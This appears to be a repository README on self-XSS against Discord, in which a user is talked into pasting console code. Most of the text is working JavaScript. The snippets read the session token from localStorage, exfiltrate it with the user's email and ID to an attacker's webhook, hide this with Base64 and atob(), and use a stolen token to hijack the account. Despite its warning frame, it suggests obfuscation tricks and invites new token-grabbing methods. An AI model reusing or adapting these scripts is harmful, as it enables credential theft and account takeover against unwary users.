Although Discord repeatedly prints massive warnings on the console, telling people about the potential dangers that pasted unknown code snippets could lead to, most users are unwary, and casually run scripts without understanding what they do.
By convincing a user to paste just a couple lines of code, an attacker could access localStorage to copy the Session Token without the user even noticing, using something like the following script:
/* Without any discernible change, an `iframe`
is created in order to access `localStorage`
through its `contentWindow` property. The users's
token is then copied and `slice` is used to remove
its quotation marks (for aesthetic purposes) */
document.body.appendChild(document.createElement("iframe")).contentWindow.localStorage.token.slice(1,-1);This script could be quickly adapted to act as a warning for uncautious users, the simplest way being to literally alert() them, like this:
let token = document.body.appendChild(document.createElement("iframe")).contentWindow.localStorage.token.slice(1,-1);
alert(`Your Discord token is:\n${token}\n\nNever paste any code you don't understand in the console!`);It could just as easily be modified into something malicious, as in this example:
let token = document.body.appendChild(document.createElement("iframe")).contentWindow.localStorage.token.slice(1,-1);
/* With a simple HTTP Request, your
token could be sent to the attacker
using a Discord Webhook. This does
not cause a CORS error as webhooks
use the same domain as the Discord
website, and are thus treated like
any other request */
fetch("https://discord.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyzABCDEFGHIJLKLMNOPQRSTUVWXYZ1234567890abcde", {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({
content: token,
embeds: null
})
});Even with a modification as simple as encoding all mentions of a "token" and the Webhook URL (which could catch their eye) to Base64 and decoding them using atob() could suffice to trick a naive user, as done in this snippet:
fetch(atob("aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTIzNDU2Nzg5MDEyMzQ1Njc4L2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSkxLTE1OT1BRUlNUVVZXWFlaMTIzNDU2Nzg5MGFiY2Rl"),{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({"content":document.body.appendChild(document.createElement("iframe")).contentWindow[atob("bG9jYWxTdG9yYWdl")][atob("dG9rZW4=")].slice(1,-1),"embeds":null})});Any attempt at obfuscation could be suspicious to some users, but the great majority wouldn't bat an eye before pasting a code-block, even with escaped characters, generated by something like obfuscator.io.
While accessing localStorage, an attacker might as well make use of other cached information (although i just realized all one would really need is the token) and create a nice embed for his webhook, as I did with the following script:
let localStorage = document.body.appendChild(document.createElement("iframe")).contentWindow.localStorage;
fetch("YOUR_WEBHOOK_URL", {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({
content: null,
embeds: [{
title: "Successfully Grabbed Token!",
color: 2067276,
fields: [{
name: "User",
value: `<@!${localStorage.user_id_cache.slice(1,-1)}>`,
inline: true
}, {
name: "Email",
value: localStorage.email_cache.slice(1,-1),
inline: true
}, {
name: "Token",
value: localStorage.token.slice(1, -1).replaceAll("-", "-\n")
}],
footer: {
text: "Hacker Pepe v0.0.0",
icon_url: "https://imgur.com/5Ri5eok.png"
}
}],
username: "Hacker Pepe",
avatar_url: "https://imgur.com/5Ri5eok.png"
})
});Regardless of whether or not an attacker sends himself another user's token using a great embed such as the one produced by the above script, allowing someone else access to localStorage can let them extract a lot of information about the user, and should never be done.
And just like that, an internet stranger could know your token. This is concerning, as by simply opening a new [incognito] tab, opening Discord, and pasting this almost identical script (ironic...), they could set their token to yours and access your account.
document.body.appendChild(document.createElement("iframe")).contentWindow.localStorage.token=`"YOUR_TOKEN"`;
location.reload();So please never paste any script into your console unless you understand what it does and fully trust the person who sent it to you.
Just a couple of hours after publishing this repository, the method used by these scripts stopped working, as the token value in localStorage is no longer persistent (which is probably a good idea, and leads me to think that this may have simply been a bug), and gets removed rather quickly as the page is loading. Although the timing was certainly a coincidence (I wish I had that much clout), I'm glad this was done, as this change could greatly reduce the likelihood of a Self-XSS attack working on Discord. I'll make sure to update the repo if I can figure out some other simple ways to grab a user's token without requiring perfect timing, and welcome anyone to open a Pull Request if you figure out a way to do so.